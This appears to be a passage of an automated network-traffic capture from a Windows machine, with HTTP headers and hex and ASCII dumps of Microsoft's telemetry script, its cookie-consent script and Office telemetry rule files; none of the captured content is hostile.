                                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        x-azure-ref: 20241124T011348Z-178bfbc474bfw4gbhC1NYCunf40000000590000000009etz
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:49 UTC15516INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                        Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28 31 31 29 5d 3d 22 49 50 72 6f 6d 69 73 65 22 29 2c 61 2e 74 6f
                                                                                                                                                                                        Data Ascii: &&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(11)]="IPromise"),a.to
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 59 28 65 2c 22 6c 69 73 74 65 6e 65 72 73 22 2c 7b 67
                                                                                                                                                                                        Data Ascii: on(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(e){Y(e,"listeners",{g
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 41 5b 74 65 5d 28 65 29 2c
                                                                                                                                                                                        Data Ascii: hComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};function c(){A[te](e),
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4e 6c 28 29 7b 72 65 74 75 72
                                                                                                                                                                                        Data Ascii: fined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return null}function Nl(){retur
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 76 61 72 20 6f 3d 74 68 69 73 2c 63 3d 7b 7d 3b
                                                                                                                                                                                        Data Ascii: me failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(a,e){var o=this,c={};
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54 61 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72
                                                                                                                                                                                        Data Ascii: ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageTags=function(e,t){var
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d 65 7c 7c 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66
                                                                                                                                                                                        Data Ascii: otype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].name||~t[n].name.indexOf
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70 6c 69 63 65 22 2c 44 67 3d 22 74 6f 4c 6f 77 65 72 43 61 73 65
                                                                                                                                                                                        Data Ascii: en",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="splice",Dg="toLowerCase
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c 74 29 3a 28 72 3d 31 2c 69 3d 32 30 2c 34 3d 3d 3d 6e 26 26 28
                                                                                                                                                                                        Data Ascii: [lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,t):(r=1,i=20,4===n&&(


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        71192.168.2.54979913.107.246.634434276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:48 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                        Host: wcpstatic.microsoft.com
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                        2024-11-24 01:13:49 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:49 GMT
                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                        Content-Length: 52717
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                        Age: 22095
                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                        Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                        Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                        Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                        x-ms-request-id: ae9d672f-401e-00c3-76da-3dd985000000
                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                        x-azure-ref: 20241124T011349Z-178bfbc474bp8mkvhC1NYCzqnn000000050000000000k824
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:49 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                        Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                        Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                        2024-11-24 01:13:49 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                        Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                        2024-11-24 01:13:49 UTC4278INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                                        Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        72192.168.2.54980013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:49 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:49 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                                                                                                        x-ms-request-id: 2deeee2f-b01e-001e-4967-3b0214000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011349Z-178bfbc474btrnf9hC1NYCb80g00000005gg000000000snh
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:49 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        73192.168.2.54980113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:49 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:49 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:49 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 502
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB6A0D312"
